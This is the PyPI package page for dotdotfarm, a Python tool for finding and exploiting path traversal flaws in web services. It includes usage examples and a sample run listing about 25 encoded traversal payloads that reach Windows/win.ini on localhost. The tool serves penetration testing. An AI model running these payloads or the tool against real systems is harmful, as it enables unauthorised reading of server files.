dotdotfarm
==========
![Version](https://img.shields.io/badge/version-1.7.2-blue?style=for-the-badge)
Utility for detection & exploitation of Path Traversal vulnerabilities in various network services
dotdotweb - PT tool for HTTP services
Tools are written in Python with using asyncio requests (aiohttp) with some acceleration techniques, which allows you to make up to ~3K requests per second
Features
--------
- using asynchronous requests for increasing scan of target
- ability to fetch files' content after succeeding a payload
- specifying payload in any part of query (URL, headers or POST data)
- using callbacks for handling of results
Installation
============
Install from PyPi
```bash
pip install dotdotfarm
```
You can also install it directly from GitHub repository
```bash
git clone https://github.com/treddis/dotdotfarm.git
cd dotdotfarm
pip3 install .
```
To upgrade tool run
```bash
pip install --upgrade dotdotfarm
```
Usage
=====
```text
.___ __ .___ __ _____
__| _/_____/ |_ __| _/_____/ |__/ ____\____ _______ _____
/ __ |/ _ \ __\/ __ |/ _ \ __\ __\\__ \\_ __ \/ \
/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \| | \/ Y Y \
\____ |\____/|__| \____ |\____/|__| |__| (____ /__| |__|_| /
\/ \/ \/ \/
usage: dotdotweb [-h] [--version] [-V] [-A] [-R] [-o {windows,linux}]
[-d DEPTH] [-f FILE] [--delay DELAY]
[-t TIMEOUT] [-fs FS] [-fc FC] [--header HEADERS] [--data DATA]
url
fast path traversal identificator & exploit
positional arguments:
url target URL
options:
-h, --help show this help message and exit
--version print version of the tool
-V, --validate validate files' content after successfull exploitation
(default false)
-A, --all try all files after successfull exploitation
(default false)
-R, --print-files read traversed files (default false)
-o {windows,linux}, --os-type {windows,linux}
target OS type (default all)
-d DEPTH, --depth DEPTH
depth of PT searching (default 5)
-f FILE, --file FILE specific file for PT detection
--delay DELAY make delays between requests in milliseconds (default 0)
-t TIMEOUT, --timeout TIMEOUT
timeout of connections (default 60)
-fs FS filter output by size
-fc FC filter output by response code
--header HEADERS custom header for requests
--data DATA specify POST data
```
### Passing payload in GET parameters
Passing brute parameters via `?par=val` pairs:
```text
dotdotweb -o windows -fc 500 \
http://someserver.com:1280/newpath?testparameter=FUZZ&secondparameter=somevalue
```
### Passing payload in headers
Passing brute parameters via `Origin: master=FUZZ` pairs:
```text
dotdotweb -o linux -fc 500,404 -H "Referer: https://www.google.com/path?q=FUZZ" \
http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue
```
### Passing payload in POST data
Passing brute parameters via POST data parameters
```text
dotdotweb -o linux -fc 500 -fs 111 -d "key0=val0&key1=val1" \
http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue
```
### Using regexp to filter responses
Pass -fs (filter by size) or -fc (filter by status code) to filter out not related responses
```text
dotdotweb -fc 50*,4* -fs 18??,1834* http://someserver.com:1234/testpath/FUZZ
```
### Launch callbacks on responses
You can launch callbacks on your responses to perform some check or make other actions.
In the box implemented callbacks:
- validate response content using regexp and print then (-V). You can pass your regexp too!
- try all payloads even entry point is found (-A)
- read traversed files content and print them on screen (-P)
Example output
==============
```text
dotdotweb -o windows "http://localhost:8080/pathtrav?query=FUZZ"
.___ __ .___ __ _____
__| _/_____/ |_ __| _/_____/ |__/ ____\____ _______ _____
/ __ |/ _ \ __\/ __ |/ _ \ __\ __\\__ \\_ __ \/ \
/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \| | \/ Y Y \
\____ |\____/|__| \____ |\____/|__| |__| (____ /__| |__|_| /
\/ \/ \/ \/
[*] Started at Sun Jan 22 19:32:46 2023
../../../Windows/win.ini [Status: 200, Size: 111]
../Windows/win.ini [Status: 200, Size: 111]
..\Windows\win.ini [Status: 200, Size: 111]
..%2fWindows%2fwin.ini [Status: 200, Size: 111]
..\..\..\Windows\win.ini [Status: 200, Size: 111]
..%5c..%5c..%5cWindows%5cwin.ini [Status: 200, Size: 111]
..%5cWindows%5cwin.ini [Status: 200, Size: 111]
.%2e/Windows/win.ini [Status: 200, Size: 111]
.%2e\Windows\win.ini [Status: 200, Size: 111]
.%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]
.%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]
%5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]
f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]
%5C../Windows/win.ini [Status: 200, Size: 111]
%5C..\%5C..\%5C..\Windows\win.ini [Status: 200, Size: 111]
.%2e\.%2e\.%2e\Windows\win.ini [Status: 200, Size: 111]
.%2e%5c.%2e%5c.%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]
%5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]
%5C../%5C../%5C../Windows/win.ini [Status: 200, Size: 111]
%5C..%5c%5C..%5c%5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]
%2e./Windows/win.ini [Status: 200, Size: 111]
%2e./%2e./%2e./Windows/win.ini [Status: 200, Size: 111]
%2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]
%2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]
.%2e%2f.%2e%2f.%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]
100%|██████████████████████████████████████████████████████████| 6960/6960 [00:12<00:00, 575.63it/s]
[*] Ended at Sun Jan 22 19:32:58 2023 (11 seconds)
```
Raw data
{
"_id": null,
"home_page": null,
"name": "dotdotfarm",
"maintainer": null,
"docs_url": null,
"requires_python": null,
"maintainer_email": null,
"keywords": "path-traversal, fuzzer, appsec, lfi, security, web, pentesting",
"author": "treddis",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/28/8e/98841b3151fa428e74882035af1f6c979e522bd219b4ca768d45e4555fc2/dotdotfarm-1.7.2.tar.gz",
"platform": null,
"description": "dotdotfarm\r\n==========\r\n\r\n![Version](https://img.shields.io/badge/version-1.7.2-blue?style=for-the-badge)\r\n\r\nUtility for detection & exploitation of Path Traversal vulnerabilities in various network services\r\n\r\ndotdotweb - PT tool for HTTP services\r\n\r\n\r\nTools are written in Python with using asyncio requests (aiohttp) with some acceleration techniques, which allows you to make up to ~3K requests per second\r\n\r\nFeatures\r\n--------\r\n- using asynchronous requests for increasing scan of target\r\n- ability to fetch files' content after succeeding a payload\r\n- specifying payload in any part of query (URL, headers or POST data)\r\n- using callbacks for handling of results\r\n\r\nInstallation\r\n============\r\nInstall from PyPi\r\n```bash\r\npip install dotdotfarm\r\n```\r\nYou can also install it directly from GitHub repository\r\n```bash\r\ngit clone https://github.com/treddis/dotdotfarm.git\r\ncd dotdotfarm\r\npip3 install .\r\n```\r\nTo upgrade tool run\r\n```bash\r\npip install --upgrade dotdotfarm\r\n```\r\n\r\nUsage\r\n=====\r\n```text\r\n\r\n .___ __ .___ __ _____ \r\n __| _/_____/ |_ __| _/_____/ |__/ ____\\____ _______ _____ \r\n / __ |/ _ \\ __\\/ __ |/ _ \\ __\\ __\\\\__ \\\\_ __ \\/ \\ \r\n/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \\| | \\/ Y Y \\\r\n\\____ |\\____/|__| \\____ |\\____/|__| |__| (____ /__| |__|_| /\r\n \\/ \\/ \\/ \\/ \r\n \r\nusage: dotdotweb [-h] [--version] [-V] [-A] [-R] [-o {windows,linux}]\r\n [-d DEPTH] [-f FILE] [--delay DELAY]\r\n [-t TIMEOUT] [-fs FS] [-fc FC] [--header HEADERS] [--data DATA]\r\n url\r\n\r\nfast path traversal identificator & exploit\r\n\r\npositional arguments:\r\n url target URL\r\n\r\noptions:\r\n -h, --help show this help message and exit\r\n --version print version of the tool\r\n -V, --validate validate files' content after successfull exploitation\r\n (default false)\r\n -A, --all try all files after successfull exploitation\r\n (default false)\r\n -R, --print-files read traversed files (default false)\r\n -o {windows,linux}, --os-type {windows,linux}\r\n target OS type (default all)\r\n -d DEPTH, --depth DEPTH\r\n depth of PT searching (default 5)\r\n -f FILE, --file FILE specific file for PT detection\r\n --delay DELAY make delays between requests in milliseconds (default 0)\r\n -t TIMEOUT, --timeout TIMEOUT\r\n timeout of connections (default 60)\r\n -fs FS filter output by size\r\n -fc FC filter output by response code\r\n --header HEADERS custom header for requests\r\n --data DATA specify POST data\r\n```\r\n\r\n### Passing payload in GET parameters\r\nPassing brute parameters via `?par=val` pairs:\r\n```text\r\ndotdotweb -o windows -fc 500 \\ \r\n http://someserver.com:1280/newpath?testparameter=FUZZ&secondparameter=somevalue\r\n```\r\n\r\n### Passing payload in headers\r\nPassing brute parameters via `Origin: master=FUZZ` pairs:\r\n```text\r\ndotdotweb -o linux -fc 500,404 -H \"Referer: https://www.google.com/path?q=FUZZ\" \\\r\n http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue\r\n```\r\n\r\n### Passing payload in POST data\r\nPassing brute parameters via POST data parameters\r\n```text\r\ndotdotweb -o linux -fc 500 -fs 111 -d \"key0=val0&key1=val1\" \\\r\n http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue\r\n```\r\n\r\n### Using regexp to filter responses\r\nPass -fs (filter by size) or -fc (filter by status code) to filter out not related responses\r\n```text\r\ndotdotweb -fc 50*,4* -fs 18??,1834* http://someserver.com:1234/testpath/FUZZ\r\n```\r\n\r\n### Launch callbacks on responses\r\nYou can launch callbacks on your responses to perform some check or make other actions.\r\nIn the box implemented callbacks:\r\n- validate response content using regexp and print then (-V). You can pass your regexp too!\r\n- try all payloads even entry point is found (-A)\r\n- read traversed files content and print them on screen (-P)\r\n\r\nExample output\r\n==============\r\n```text\r\ndotdotweb -o windows \"http://localhost:8080/pathtrav?query=FUZZ\" \r\n\r\n .___ __ .___ __ _____\r\n __| _/_____/ |_ __| _/_____/ |__/ ____\\____ _______ _____\r\n / __ |/ _ \\ __\\/ __ |/ _ \\ __\\ __\\\\__ \\\\_ __ \\/ \\\r\n/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \\| | \\/ Y Y \\\r\n\\____ |\\____/|__| \\____ |\\____/|__| |__| (____ /__| |__|_| /\r\n \\/ \\/ \\/ \\/\r\n\r\n[*] Started at Sun Jan 22 19:32:46 2023\r\n ../../../Windows/win.ini [Status: 200, Size: 111]\r\n ../Windows/win.ini [Status: 200, Size: 111]\r\n ..\\Windows\\win.ini [Status: 200, Size: 111]\r\n ..%2fWindows%2fwin.ini [Status: 200, Size: 111]\r\n ..\\..\\..\\Windows\\win.ini [Status: 200, Size: 111]\r\n ..%5c..%5c..%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n ..%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n .%2e/Windows/win.ini [Status: 200, Size: 111]\r\n .%2e\\Windows\\win.ini [Status: 200, Size: 111]\r\n .%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]\r\n .%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n %5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]\r\n %5C../Windows/win.ini [Status: 200, Size: 111]\r\n %5C..\\%5C..\\%5C..\\Windows\\win.ini [Status: 200, Size: 111]\r\n .%2e\\.%2e\\.%2e\\Windows\\win.ini [Status: 200, Size: 111]\r\n .%2e%5c.%2e%5c.%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n %5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]\r\n %5C../%5C../%5C../Windows/win.ini [Status: 200, Size: 111]\r\n %5C..%5c%5C..%5c%5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n %2e./Windows/win.ini [Status: 200, Size: 111]\r\n %2e./%2e./%2e./Windows/win.ini [Status: 200, Size: 111]\r\n %2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n %2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]\r\n .%2e%2f.%2e%2f.%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]\r\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 6960/6960 [00:12<00:00, 575.63it/s]\r\n[*] Ended at Sun Jan 22 19:32:58 2023 (11 seconds)\r\n```\r\n",
"bugtrack_url": null,
"license": "GPLv3 license",
"summary": "Fast Path Traversal exploitation tool",
"version": "1.7.2",
"project_urls": {
"Changelog": "https://github.com/treddis/dotdotfarm/blob/master/CHANGELOG.md",
"Homepage": "https://github.com/treddis/dotdotfarm",
"Repository": "https://github.com/treddis/dotdotfarm.git"
},
"split_keywords": [
"path-traversal",
" fuzzer",
" appsec",
" lfi",
" security",
" web",
" pentesting"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "288e98841b3151fa428e74882035af1f6c979e522bd219b4ca768d45e4555fc2",
"md5": "48804b952432e78622ee0bd43754eaef",
"sha256": "f60742053319c25aa083b67e917f801e76a263de4eaada05fa49b6825dcdab01"
},
"downloads": -1,
"filename": "dotdotfarm-1.7.2.tar.gz",
"has_sig": false,
"md5_digest": "48804b952432e78622ee0bd43754eaef",
"packagetype": "sdist",
"python_version": "source",
"requires_python": null,
"size": 25827,
"upload_time": "2024-04-19T18:18:40",
"upload_time_iso_8601": "2024-04-19T18:18:40.560735Z",
"url": "https://files.pythonhosted.org/packages/28/8e/98841b3151fa428e74882035af1f6c979e522bd219b4ca768d45e4555fc2/dotdotfarm-1.7.2.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-04-19 18:18:40",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "treddis",
"github_project": "dotdotfarm",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [
{
"name": "aiohttp",
"specs": [
[
"==",
"3.9.5"
]
]
},
{
"name": "aiohttp-socks",
"specs": [
[
"==",
"0.8.4"
]
]
},
{
"name": "aiosignal",
"specs": [
[
"==",
"1.3.1"
]
]
},
{
"name": "async-timeout",
"specs": [
[
"==",
"4.0.3"
]
]
},
{
"name": "attrs",
"specs": [
[
"==",
"23.2.0"
]
]
},
{
"name": "blinker",
"specs": [
[
"==",
"1.7.0"
]
]
},
{
"name": "click",
"specs": [
[
"==",
"8.1.7"
]
]
},
{
"name": "colorama",
"specs": [
[
"==",
"0.4.6"
]
]
},
{
"name": "flask",
"specs": [
[
"==",
"3.0.3"
]
]
},
{
"name": "frozenlist",
"specs": [
[
"==",
"1.4.1"
]
]
},
{
"name": "idna",
"specs": [
[
"==",
"3.7"
]
]
},
{
"name": "itsdangerous",
"specs": [
[
"==",
"2.2.0"
]
]
},
{
"name": "jinja2",
"specs": [
[
"==",
"3.1.3"
]
]
},
{
"name": "markupsafe",
"specs": [
[
"==",
"2.1.5"
]
]
},
{
"name": "multidict",
"specs": [
[
"==",
"6.0.5"
]
]
},
{
"name": "python-socks",
"specs": [
[
"==",
"2.4.4"
]
]
},
{
"name": "tqdm",
"specs": [
[
"==",
"4.64.1"
]
]
},
{
"name": "websockets",
"specs": [
[
"==",
"12.0"
]
]
},
{
"name": "werkzeug",
"specs": [
[
"==",
"3.0.2"
]
]
},
{
"name": "yarl",
"specs": [
[
"==",
"1.9.4"
]
]
}
],
"lcname": "dotdotfarm"
}